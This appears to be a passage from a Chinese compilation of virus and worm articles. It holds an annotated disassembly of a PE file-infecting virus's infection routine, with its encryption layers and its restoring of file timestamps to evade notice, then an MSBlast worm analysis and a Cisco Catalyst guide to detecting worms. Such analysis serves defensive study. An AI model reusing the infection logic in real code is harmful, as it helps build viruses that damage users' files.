00412AF7 C1E8 04 SHR EAX,4

00412AFA 24 07 AND AL,7

00412AFC 3C 05 CMP AL,5

00412AFE 76 02 JBE SHORT CLSPACK.00412B02

00412B00 2C 02 SUB AL,2

00412B02 8AD8 MOV BL,AL

00412B04 58 POP EAX

00412B05 24 07 AND AL,7

00412B07 3C 05 CMP AL,5

00412B09 76 02 JBE SHORT CLSPACK.00412B0D

00412B0B 2C 04 SUB AL,4

00412B0D 38D8 CMP AL,BL

00412B0F 75 0D JNZ SHORT CLSPACK.00412B1E

00412B11 3C 05 CMP AL,5

00412B13 74 04 JE SHORT CLSPACK.00412B19

00412B15 FEC3 INC BL

00412B17 EB 05 JMP SHORT CLSPACK.00412B1E

00412B19 80E2 03 AND DL,3

00412B1C 8ADA MOV BL,DL

00412B1E 83E0 07 AND EAX,7

00412B21 83E3 07 AND EBX,7

00412B24 83E1 07 AND ECX,7

00412B27 E8 6C050000 CALL CLSPACK.00413098 这个CALL根椐上面产生的随机数产生随机代码,(里面包含一张表)

00412B2C 5A POP EDX

00412B2D 59 POP ECX

00412B2E 5B POP EBX

00412B2F 58 POP EAX

00412B30 81E3 FF0F0000 AND EBX,0FFF

00412B36 899F 7F100000 MOV DWORD PTR DS:[EDI+107F],EBX

00412B3C B9 46310000 MOV ECX,3146

00412B41 2BCB SUB ECX,EBX

00412B43 898F 85100000 MOV DWORD PTR DS:[EDI+1085],ECX

00412B49 59 POP ECX

00412B4A 5B POP EBX

00412B4B 8987 8F100000 MOV DWORD PTR DS:[EDI+108F],EAX

00412B51 66:C746 09 54C3 MOV WORD PTR DS:[ESI+9],0C354 写入感染标志,这个位置为PE文件的TimeDateStamp处

00412B57 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] 原AddressOfEntryPoint

00412B5A 8987 5F060000 MOV DWORD PTR DS:[EDI+65F],EAX 呵呵,在解密后的病毒+65F处可以看见

可爱的入口地址

00412B60 8B46 38 MOV EAX,DWORD PTR DS:[ESI+38] SectionAlignment

00412B63 8987 942E0000 MOV DWORD PTR DS:[EDI+2E94],EAX

00412B69 8B46 34 MOV EAX,DWORD PTR DS:[ESI+34] ImageBase

00412B6C 8987 B2300000 MOV DWORD PTR DS:[EDI+30B2],EAX

00412B72 8D5E 18 LEA EBX,DWORD PTR DS:[ESI+18] Magic

00412B75 33D2 XOR EDX,EDX

00412B77 66:8B56 14 MOV DX,WORD PTR DS:[ESI+14] SizeOfOptionHeader

00412B7B 03DA ADD EBX,EDX EBX->第一个节表

00412B7D 33C9 XOR ECX,ECX

00412B7F 66:8B4E 06 MOV CX,WORD PTR DS:[ESI+6] NumberOfSections

00412B83 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] AddressofEntryPoint

00412B86 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] VirtualAddress

00412B89 3BC2 CMP EAX,EDX

00412B8B 72 07 JB SHORT CLSPACK.00412B94 如果AddressOfEntryPoint

00412B8D 0353 08 ADD EDX,DWORD PTR DS:[EBX+8] VirtualSize

00412B90 3BC2 CMP EAX,EDX

00412B92 76 18 JBE SHORT CLSPACK.00412BAC 如果入口点在当前节中则跳

00412B94 83C3 28 ADD EBX,28

00412B97 ^E2 EA LOOPD SHORT CLSPACK.00412B83

00412B99 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1

00412BA0 74 05 JE SHORT CLSPACK.00412BA7

00412BA2 E9 43030000 JMP CLSPACK.00412EEA

00412BA7 E9 F5190000 JMP CLSPACK.004145A1

00412BAC 50 PUSH EAX

00412BAD 52 PUSH EDX

00412BAE 05 00020000 ADD EAX,200

00412BB3 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] VirtualAddress

00412BB6 0353 10 ADD EDX,DWORD PTR DS:[EBX+10] SizeOfRawData

00412BB9 3BC2 CMP EAX,EDX

00412BBB 5A POP EDX

00412BBC 58 POP EAX

00412BBD 77 24 JA SHORT CLSPACK.00412BE3

00412BBF 50 PUSH EAX

00412BC0 0346 34 ADD EAX,DWORD PTR DS:[ESI+34] ImageBase

00412BC3 8987 18060000 MOV DWORD PTR DS:[EDI+618],EAX ImageBase+AddressOfEntryPoint

00412BC9 8B43 24 MOV EAX,DWORD PTR DS:[EBX+24] Characteristics

00412BCC 0D 00000020 OR EAX,20000000 IMAGE_SCN_MEM_EXECUTE

00412BD1 8943 24 MOV DWORD PTR DS:[EBX+24],EAX 写回

00412BD4 58 POP EAX AddressOfEntryPoint

00412BD5 2B43 0C SUB EAX,DWORD PTR DS:[EBX+C] EAX-VirtualAddress

00412BD8 0343 14 ADD EAX,DWORD PTR DS:[EBX+14] PointerToRawData

00412BDB 8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX EAX->FileOffset

00412BE1 EB 2F JMP SHORT CLSPACK.00412C12

00412BE3 50 PUSH EAX

00412BE4 52 PUSH EDX

00412BE5 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C]

00412BE8 8956 28 MOV DWORD PTR DS:[ESI+28],EDX

00412BEB 0356 34 ADD EDX,DWORD PTR DS:[ESI+34]

00412BEE 8997 18060000 MOV DWORD PTR DS:[EDI+618],EDX

00412BF4 8B43 24 MOV EAX,DWORD PTR DS:[EBX+24]

00412BF7 0D 00000020 OR EAX,20000000

00412BFC 8943 24 MOV DWORD PTR DS:[EBX+24],EAX

00412BFF 5A POP EDX

00412C00 58 POP EAX

00412C01 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]

00412C04 8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX

00412C0A 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX

00412C10 EB 79 JMP SHORT CLSPACK.00412C8B

00412C12 8D5E 18 LEA EBX,DWORD PTR DS:[ESI+18] ESI->'PE'

00412C15 33D2 XOR EDX,EDX

00412C17 66:8B56 14 MOV DX,WORD PTR DS:[ESI+14]

00412C1B 03DA ADD EBX,EDX EBX->.text

00412C1D 33C9 XOR ECX,ECX

00412C1F 66:8B4E 06 MOV CX,WORD PTR DS:[ESI+6] NumberOfSections

00412C23 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10] SizeOfRawData

00412C26 2B43 08 SUB EAX,DWORD PTR DS:[EBX+8] VirtualSize

00412C29 3B87 AE300000 CMP EAX,DWORD PTR DS:[EDI+30AE] CMP EAX,200

00412C2F 7D 37 JGE SHORT CLSPACK.00412C68

00412C31 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28]

00412C34 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C]

00412C37 3BC2 CMP EAX,EDX

00412C39 72 07 JB SHORT CLSPACK.00412C42

00412C3B 0353 08 ADD EDX,DWORD PTR DS:[EBX+8]

00412C3E 3BC2 CMP EAX,EDX

00412C40 76 18 JBE SHORT CLSPACK.00412C5A

00412C42 83C3 28 ADD EBX,28

00412C45 ^E2 DC LOOPD SHORT CLSPACK.00412C23

00412C47 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1

00412C4E 74 05 JE SHORT CLSPACK.00412C55

00412C50 E9 95020000 JMP CLSPACK.00412EEA

00412C55 E9 47190000 JMP CLSPACK.004145A1

00412C5A 2B43 0C SUB EAX,DWORD PTR DS:[EBX+C]

00412C5D 0343 14 ADD EAX,DWORD PTR DS:[EBX+14]

00412C60 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX //EPOFileOffset

00412C66 EB 23 JMP SHORT CLSPACK.00412C8B

00412C68 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]

00412C6B 0343 08 ADD EAX,DWORD PTR DS:[EBX+8]

00412C6E 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX

00412C74 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]

00412C77 0343 08 ADD EAX,DWORD PTR DS:[EBX+8]

00412C7A 8946 28 MOV DWORD PTR DS:[ESI+28],EAX

00412C7D 50 PUSH EAX

00412C7E 8B43 08 MOV EAX,DWORD PTR DS:[EBX+8]

00412C81 0387 AE300000 ADD EAX,DWORD PTR DS:[EDI+30AE]

00412C87 8943 08 MOV DWORD PTR DS:[EBX+8],EAX

00412C8A 58 POP EAX

00412C8B 83C3 28 ADD EBX,28

00412C8E ^E2 FB LOOPD SHORT CLSPACK.00412C8B 定位到最后一个节上

00412C90 83EB 28 SUB EBX,28

00412C93 C743 24 400000C0 MOV DWORD PTR DS:[EBX+24],C0000040 改节属性

00412C9A 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10] SizeOfRawData

00412C9D 50 PUSH EAX

00412C9E 0343 0C ADD EAX,DWORD PTR DS:[EBX+C] VirtualAddress

00412CA1 0346 34 ADD EAX,DWORD PTR DS:[ESI+34] Image

00412CA4 51 PUSH ECX

00412CA5 8A4E 08 MOV CL,BYTE PTR DS:[ESI+8] TimeDateStamp

00412CA8 80E1 1F AND CL,1F

00412CAB 888F 8B100000 MOV BYTE PTR DS:[EDI+108B],CL

00412CB1 D3C8 ROR EAX,CL

00412CB3 59 POP ECX

00412CB4 8987 7A100000 MOV DWORD PTR DS:[EDI+107A],EAX 20CA000H

00412CBA B9 00320000 MOV ECX,3200

00412CBF 014B 10 ADD DWORD PTR DS:[EBX+10],ECX 把最后一节大小加3200H

00412CC2 014E 20 ADD DWORD PTR DS:[ESI+20],ECX SizeOfinitializeData+3200H

00412CC5 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]

00412CC8 3B43 08 CMP EAX,DWORD PTR DS:[EBX+8]

00412CCB 76 03 JBE SHORT CLSPACK.00412CD0

00412CCD 8943 08 MOV DWORD PTR DS:[EBX+8],EAX

00412CD0 05 FF0F0000 ADD EAX,0FFF

00412CD5 25 00F0FFFF AND EAX,FFFFF000

00412CDA 0343 0C ADD EAX,DWORD PTR DS:[EBX+C]

00412CDD 8946 50 MOV DWORD PTR DS:[ESI+50],EAX SizeOfImage

00412CE0 52 PUSH EDX

00412CE1 8B53 08 MOV EDX,DWORD PTR DS:[EBX+8]

00412CE4 0353 0C ADD EDX,DWORD PTR DS:[EBX+C]

00412CE7 3BC2 CMP EAX,EDX

00412CE9 73 03 JNB SHORT CLSPACK.00412CEE

00412CEB 8956 50 MOV DWORD PTR DS:[ESI+50],EDX

00412CEE 5A POP EDX

00412CEF 5A POP EDX

00412CF0 0353 14 ADD EDX,DWORD PTR DS:[EBX+14]

00412CF3 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88] hFile

00412CF9 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1

00412D00 75 05 JNZ SHORT CLSPACK.00412D07

00412D02 E9 75170000 JMP CLSPACK.0041447C

00412D07 51 PUSH ECX

00412D08 52 PUSH EDX

00412D09 6A 00 PUSH 0

00412D0B 53 PUSH EBX

00412D0C FF97 B12A0000 CALL DWORD PTR DS:[EDI+2AB1] GetFileSize

00412D12 5A POP EDX

00412D13 59 POP ECX

00412D14 83F8 00 CMP EAX,0

00412D17 0F84 CD010000 JE CLSPACK.00412EEA

00412D1D 8BDA MOV EBX,EDX

00412D1F 81C3 00020000 ADD EBX,200

00412D25 3BC3 CMP EAX,EBX

00412D27 0F87 BD010000 JA CLSPACK.00412EEA 不符合感染条件则跳(空间不够大)

00412D2D 60 PUSHAD

00412D2E 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412D34 6A 00 PUSH 0

00412D36 6A 00 PUSH 0

00412D38 8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]

00412D3E 52 PUSH EDX

00412D3F 53 PUSH EBX

00412D40 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89] SetFilePointer

00412D46 83F8 00 CMP EAX,0

00412D49 61 POPAD

00412D4A 0F84 9A010000 JE CLSPACK.00412EEA

00412D50 60 PUSHAD

00412D51 6A 00 PUSH 0

00412D53 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]

00412D59 50 PUSH EAX

00412D5A B8 04020000 MOV EAX,204

00412D5F 50 PUSH EAX

00412D60 8D87 A62E0000 LEA EAX,DWORD PTR DS:[EDI+2EA6]

00412D66 50 PUSH EAX

00412D67 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412D6D 53 PUSH EBX

00412D6E FF97 9D2A0000 CALL DWORD PTR DS:[EDI+2A9D] ReadFileA

00412D74 83F8 00 CMP EAX,0

00412D77 61 POPAD

00412D78 0F84 6C010000 JE CLSPACK.00412EEA

00412D7E 83BF A6300000 00 CMP DWORD PTR DS:[EDI+30A6],0

00412D85 75 0A JNZ SHORT CLSPACK.00412D91

00412D87 C787 A6300000 6A>MOV DWORD PTR DS:[EDI+30A6],23EDA56A

00412D91 60 PUSHAD

00412D92 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412D98 6A 00 PUSH 0

00412D9A 6A 00 PUSH 0

00412D9C 8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]

00412DA2 52 PUSH EDX

00412DA3 53 PUSH EBX

00412DA4 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89] SetFilePointer

00412DAA 83F8 00 CMP EAX,0

00412DAD 61 POPAD

00412DAE 0F84 36010000 JE CLSPACK.00412EEA

00412DB4 60 PUSHAD

00412DB5 6A 00 PUSH 0

00412DB7 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]

00412DBD 50 PUSH EAX

00412DBE B8 00020000 MOV EAX,200

00412DC3 50 PUSH EAX

00412DC4 8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]

00412DCA 50 PUSH EAX

00412DCB 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412DD1 53 PUSH EBX

00412DD2 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D] WriteFileA

00412DD8 83F8 00 CMP EAX,0

00412DDB 61 POPAD

00412DDC 0F84 08010000 JE CLSPACK.00412EEA

00412DE2 E8 F5030000 CALL CLSPACK.004131DC Xor [ESI],EAX len=1FCH

00412DE7 E8 21050000 CALL CLSPACK.0041330D ROR EAX,10H len=BF5H

00412DEC E8 3B050000 CALL CLSPACK.0041332C 这里是五层加密的地方

00412DF1 E8 F9040000 CALL CLSPACK.004132EF

00412DF6 E8 C3040000 CALL CLSPACK.004132BE 跟前面的五次解密顺序相反

00412DFB 60 PUSHAD

00412DFC E8 92030000 CALL CLSPACK.00413193

00412E01 61 POPAD

00412E02 60 PUSHAD

00412E03 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412E09 6A 00 PUSH 0

00412E0B 6A 00 PUSH 0

00412E0D 52 PUSH EDX

00412E0E 53 PUSH EBX

00412E0F FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]

00412E15 83F8 00 CMP EAX,0

00412E18 61 POPAD

00412E19 0F84 CB000000 JE CLSPACK.00412EEA

00412E1F 60 PUSHAD

00412E20 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412E26 6A 00 PUSH 0

00412E28 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]

00412E2E 50 PUSH EAX

00412E2F 51 PUSH ECX

00412E30 8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]

00412E36 50 PUSH EAX

00412E37 53 PUSH EBX

00412E38 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]

00412E3E 83F8 00 CMP EAX,0

00412E41 61 POPAD

00412E42 0F84 A2000000 JE CLSPACK.00412EEA

00412E48 60 PUSHAD

00412E49 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412E4F 6A 00 PUSH 0

00412E51 6A 00 PUSH 0

00412E53 FFB7 902E0000 PUSH DWORD PTR DS:[EDI+2E90]

00412E59 53 PUSH EBX

00412E5A FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]

00412E60 83F8 00 CMP EAX,0

00412E63 61 POPAD

00412E64 0F84 80000000 JE CLSPACK.00412EEA

00412E6A 60 PUSHAD

00412E6B 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412E71 6A 00 PUSH 0

00412E73 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]

00412E79 , ; 50 PUSH EAX

00412E7A 68 00040000 PUSH 400

00412E7F 8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]

00412E85 50 PUSH EAX

00412E86 53 PUSH EBX

00412E87 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]

00412E8D 83F8 00 CMP EAX,0

00412E90 61 POPAD

00412E91 74 57 JE SHORT CLSPACK.00412EEA

00412E93 60 PUSHAD

00412E94 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412E9A 6A 00 PUSH 0

00412E9C 6A 00 PUSH 0

00412E9E FFB7 8C2E0000 PUSH DWORD PTR DS:[EDI+2E8C]

00412EA4 53 PUSH EBX

00412EA5 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]

00412EAB 83F8 00 CMP EAX,0

00412EAE 61 POPAD

00412EAF 74 39 JE SHORT CLSPACK.00412EEA

00412EB1 E8 0A050000 CALL CLSPACK.004133C0

00412EB6 E8 D20C0000 CALL CLSPACK.00413B8D

00412EBB E8 35030000 CALL CLSPACK.004131F5

00412EC0 60 PUSHAD

00412EC1 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]

00412EC7 6A 00 PUSH 0

00412EC9 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]

00412ECF 50 PUSH EAX

00412ED0 FFB7 AE300000 PUSH DWORD PTR DS:[EDI+30AE]

00412ED6 8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]

00412EDC 50 PUSH EAX

00412EDD 53 PUSH EBX

00412EDE FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]

00412EE4 83F8 00 CMP EAX,0

00412EE7 61 POPAD

00412EE8 74 00 JE SHORT CLSPACK.00412EEA

00412EEA 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]

00412EF0 83E8 2C SUB EAX,2C

00412EF3 83C0 14 ADD EAX,14

00412EF6 50 PUSH EAX

00412EF7 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]

00412EFD 83E8 2C SUB EAX,2C

00412F00 83C0 0C ADD EAX,0C

00412F03 50 PUSH EAX

00412F04 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]

00412F0A 83E8 2C SUB EAX,2C

00412F0D 83C0 04 ADD EAX,4

00412F10 50 PUSH EAX

00412F11 FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]

00412F17 FF97 B52A0000 CALL DWORD PTR DS:[EDI+2AB5]

00412F1D FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]

00412F23 FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79] SetFileTime 恢复文件时间,防止被发现

00412F29 81BF 412B0000 88>CMP DWORD PTR DS:[EDI+2B41],88888888

00412F33 74 17 JE SHORT CLSPACK.00412F4C

00412F35 81BF 4D2B0000 CC>CMP DWORD PTR DS:[EDI+2B4D],CCCCCCCC

00412F3F 74 0B JE SHORT CLSPACK.00412F4C

00412F41 68 00100000 PUSH 1000

00412F46 FF97 A92A0000 CALL DWORD PTR DS:[EDI+2AA9] Sleep

00412F4C FFB7 842E0000 PUSH DWORD PTR DS:[EDI+2E84]

00412F52 FFB7 B4290000 PUSH DWORD PTR DS:[EDI+29B4]

00412F58 FF97 A12A0000 CALL DWORD PTR DS:[EDI+2AA1] SetFileAttrubutes 恢复文件属性

00412F5E 5E POP ESI

00412F5F C3 RETN

12.则解密原宿主程序代码(总共200字节),

恢复原AddressOfEntryPoint,执行原程序.

篇9：针对MSBlast蠕虫病毒一点分析

漏洞说明：

RPC（RemoteProcedureCall）BufferOverrun蠕虫漏洞，微软于7月16日发布此漏洞的安全补丁（MS-0326），漏洞原理及攻击代码最早为Flashsky发布在安全焦点，发布时并有安全会有针对此漏洞的蠕虫病毒，2个星期之后病毒代码被病毒作者利用写出MSBlast蠕虫病毒。还没等用户更新此安全补丁，就己经导致MSBlast蠕虫病毒在全球范围内大规模传播，相信这几天MSBlast蠕虫病毒将会导致更多使用者受此病毒的攻击。微软公司针对此漏洞进行详细讲解。

微软针对缺陷的安全补丁：http：//www.microsoft.com/technet/treeview/？url=/technet/security/bulletin/MS03-026.asp

病毒浅析：

该病毒使用C编写，病毒可执行使用UPX软件压缩之后总长度为6176字节，在病毒程序中包含Flashsky编写的漏洞攻击代码，说明该病毒是利用Flashsky编写的攻击代码。此攻击代码主要针对windows2000操作系统而编写，攻击代码中包含绝大部分Widnows2000溢出文件偏移地址，针对NT4XP2003溢出攻击都不会成功，因为操作系统版本不相同，溢出文件偏移地址也不相同，溢出不成功将会导致RemoteProcedureCall（RPC）服务停止，文件复制贴粘无法使用，COM属性无法正常使用。NT4XP2003操作系统溢出不成功将会导致RPC服务被终止，而PRC服务进程被异常终止之后可能会导致计算机重新启动。PRC服务通讯则依赖TCP/135端口进行通讯。

病毒执行之后将会在%SystemRoot%system32目标下生成msblast.exe病毒可执行文件。并在注册表添加自运行键值HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun，键值项目名称为windowsautoupdate，键值会批向%SystemRoot%system32msblast.exe目录下，病毒程序进程名为msblast.exe，

蠕虫病毒成功执行后并在本机创建TFTPUDP/69服务端，如果溢出攻击成功，则利用cmd.exe绑定目标主机TCP/4444端口，发送TFTP下载命令将病毒文件msblast.exe复制到目标操作系统。病毒程序将向当前IP地址C段发送SYN封包扫描。完成C段IP扫描之后病毒程序将会随机产生IP地址向外部进行扫描，病毒程序在进行扫描过程中会消耗大量网络资源及系统资源。

蠕虫病毒攻击代码针对WindowsXP2003操作系统并不会成功，但会造成WindowsXP2003PRC服务停止，导致操作系统重新启动。

发现蠕虫病毒中文本数据：billygateswhydoyoumakethispossible？Stopmakingmoneyandfixyoursoftware！

感染步骤：

首先A主机感染之后向B主机发送攻击代码：

如果攻击成功：

（1）开启B机器TCP/4444端口，发送TFTP下载命令将A主机上的病毒文件复制到B主机并执行。执行之后B机器又会向其它IP地址进行扫描并进行溢出攻击。

如果攻击失败：

（1）B主机屏蔽135端口，A主机无法发送攻击代码至B主机，导致溢出攻击失败。

（2）B主机被溢出攻击之后，因文件偏移地址不同，导致溢出不成功。并会将RPC服务停止，文件复制贴粘无法使用，COM属性无法正常使用，XP操作系统攻击之后会造成机器重启。重新启动操作系统会恢复正常，但极易再次受到溢出攻击。

解决对策：

针对解决对策强烈建议你安装微软MS-0326操作系统补丁，因MSBlast蠕虫病毒是利用微软这个操作系统缺陷进行攻击。

WindowsMe98

WindowsMe98不受此病毒的影响，建议安装防火墙产品防止病毒及入侵者进攻。

WinNT4

针对WindowsNT4操作系统己经发布针对此漏洞进行修正补丁，补丁下载地址为：

http：//microsoft.com/downloads/details.aspx？FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F

篇10：利用Catalyst交换机防范蠕虫病毒

利用Catalyst交换机防范蠕虫病毒

互联网蠕虫的泛滥在最近几年造成了巨大的损失，让很多服务运营商和企业网络的管理员甚为头疼的不仅是其不断的发展变种，而且发作造成的损害也越来越严重。尽管蠕虫本身通常并不破坏任何的数据，但它所带来的直接和间接的破坏使得网络和系统拥塞。受感染的端系统的计算资源会受到严重影响，而病毒的传播则消耗大量的链路带宽，更可怕的是网络基础设备受到影响而造成网络的不稳定甚至瘫痪。以SQL Slammer为例，发生感染传播高峰时造成的平均包丢失率为20%，网络的不稳定引起了银行ATM自动提款机不能工作，航空公司的售票系统瘫痪，仅仅两天的时间，就有30万台主机感染了SQL Slammer，造成的损失达数十亿美元。

在这里我想说的是如何利用网络设备防范蠕虫病毒的入侵。

今天的企业越来越多地把关键业务应用、语音、视频等新型应用融合到IP网络上，一个安全、可靠的网络是企业业务成功的关键。而企业网络的内部和外部的界限越来越模糊，用户的移动性越来越强，过去我们认为是安全的`内部局域网已经潜伏着威胁。我们很难保证病毒不会被带入我们的企业网络，而局域网的广泛分布和高速连接，也使其很可能成为蠕虫快速泛滥的温床。如何应对现在新的网络安全环境呢？如何在我们的局域网上防范蠕虫，及时地发现、跟踪和阻止其泛滥，是每个网络管理人员所思考的问题。

也许这是一个非常大的命题，事实上也确实需要一个系统的、协同的安全策略才能实现。从网络到主机，从核心层到分布层、接入层，我们要采取全面的企业安全策略来保护整个网络和其所连接的系统，另外即使当蠕虫发生时我们要有措施将其影响尽量缓解，并保护我们的网络基础设施，保证网络的稳定运行。

本文将介绍Cisco Catalyst交换机上的一个独特解决方案，以一种非常经济、有效和可扩展的方式来防范蠕虫病毒的危害。

首先我们要了解蠕虫的异常行为，并有手段来尽早发现其异常行为。发现可疑行为后要能很快定位其来源，即跟踪到其源IP地址、MAC地址、登录用户名、所连接的交换机和端口号等等。要搜集到证据并作出判断，如果确是蠕虫病毒，就要及时做出响应的动作，例如关闭端口，对被感染机器进行处理。

但是我们知道，接入交换机遍布于每个配线间，为企业的桌面系统提供边缘接入，由于成本和管理的原因，我们不可能在每个接入层交换机旁都放置一台IDS设备。如果是在分布层或核心层部署IDS，对于汇聚了成百上千个百兆/千兆以太网流量的分布层或核心层来说，工作在第7层的软件实现的IDS无法处理海量的数据，所以不加选择地对所有流量都进行监控是不实际的。

怎么能找到一种有的放矢、行之有效而又经济扩展的解决方案呢？利用Catalyst交换机所集成的安全特性和Netflow，就可以做到！

发现可疑流量。我们利用Cisco Netflow所采集和输出的网络流量的统计信息，可以发现单个主机发出超出正常数量的连接请求，这种不正常的大数量的流往往是蠕虫爆发或网络滥用的迹象。因为蠕虫的特性就是在发作时会扫描大量随机IP地址来寻找可能的目标，会产生大量的TCP或ICMP流。流记录里其实没有数据包的载荷(payload)信息。这是Netflow和传统IDS的一个重要区别，一个流记录里不包含高层信息，这样的好处则是可以高速地以硬件方式处理，适合于繁忙的高速局域网环境。通常部署在核心层和分布层的Catalyst 4500和Catalyst 6500交换机都支持基于硬件的Netflow。所以Netflow不能对数据包做出深层分析，但是已经有足够的信息来发现可疑流量，而且不受“0日”的局限。如果分析和利用得当，Netflow记录非常适用于早期的蠕虫或其他网络滥用行为的检测。

了解流量模式的基线非常重要。例如，一个用户同时有50-100个活动的连接是正常的，但是如果一个用户发起大量的(例如1000个)活动的流就是非正常的了。

追踪可疑的源头。识别出可疑流量后，同样重要的是追踪到源头(包括物理位置和用户ID)。在今天的移动的环境中，用户可以在整个园区网中随意漫游，仅仅知道源IP地址是很难快速定位用户的。而且我们还要防止IP地址假冒，否则检测出的源IP地址无助于我们追查可疑源头。另外我们不仅要定位到连接的端口，还要定位登录的用户名。

搜集可疑流量。一旦可疑流量被监测到，我们需要捕获这些数据包来判断这个不正常的流量到底是不是发生了新的蠕虫攻击。正如上面所述，Netflow并不对数据包做深层分析，我们需要网络分析工具或入侵检测设备来做进一步的判断。但是，如何能方便快捷地捕获可疑流量并导向网络分析工具呢？速度是很重要的，否则你就错过了把蠕虫扼杀在早期的机会。除了要很快定位可疑设备的物理位置，还要有手段能尽快搜集到证据。我们不可能在每个接入交换机旁放置网络分析或入侵检测设备，也不可能在发现可疑流量时扛着分析仪跑去配线间。

有了上面的分析，下面我们就看如何利用Catalyst的功能来满足这些需要！

检测可疑流量. Cat6500 和 Catalyst 4500 ( Sup IV, Sup V 和 Sup V – 10 GE ) 提供了基于硬件的Netflow 功能，采集流经网络的流量信息。这些信息采集和统计都通过硬件ASCI完成，所以对系统性能没有影响。 Catalyst 4500 Sup V-10GE缺省就带了Netflow卡，所以不需增加投资。

追踪可疑源头。 Catalyst 集成的安全特性提供了基于身份的网络服务(IBNS)，以及DHCP监听、源IP防护、和动态ARP检测等功能。这些功能提供了用户的IP地址和MAC地址、物理端口的绑定信息，同时防范IP地址假冒。这点非常重要，如果不能防范IP地址假冒，那么Netflow搜集到的信息就没有意义了。用户一旦登录网络，就可获得这些信息。结合ACS，还可以定位用户登录的用户名。在Netflow 收集器(Netflow Collector)上编写一个脚本文件，当发现可疑流量时，就能以email的方式，把相关信息发送给网络管理员。

在通知email里，报告了有不正常网络活动的用户CITG, 所属组是CITG-1(这是802.1x登录所用的)。接入层交换机的IP地址是10.252.240.10，物理接口是FastEthernet4/1，另外还有客户端IP地址和MAC地址，以及其在5分钟内(这个时间是脚本所定义的)发出的flow和packet数量。

掌握了这些信息后，网管员就可以马上采取以下行动了：

通过远程SPAN捕获可疑流量。Catalyst交换机上所支持的远程端口镜像功能可以将流量捕获镜像到一个远程交换机上，例如将接入层交换机上某个端口或VLAN的流量穿过中继镜像到分布层或核心层的某个端口，只需非常简单的几命令即可完成。流量被捕获到网络分析或入侵检测设备(例如Cat6500集成的网络分析模块NAM或IDS模块)，作进一步的分析和做出相应的动作。

整个过程需要多长时间呢？对于一个有经验的网管员来说，在蠕虫发生的5分钟内就能完成，而且他不需要离开他的座位！

我们可以看到，这个解决方案结合了Catalyst上集成的多种安全特性功能，从扩展的802.1x，到DHCP 监听、动态ARP检测、源IP防护和Netflow。这些安全特性的综合使用，为我们提供了一个在企业局域网上有效防范蠕虫攻击的解决方案，这个方案不需更多额外投资，因为利用的是集成在Catalyst 上的IOS中的功能特性，也带给我们一个思考：如何利用网络来保护网络？这些我们在选择交换机时可能忽略的特性，会带给我们意想不到的行之有效的安全解决方案！

篇11：防范邮件蠕虫病毒绝对四秘籍

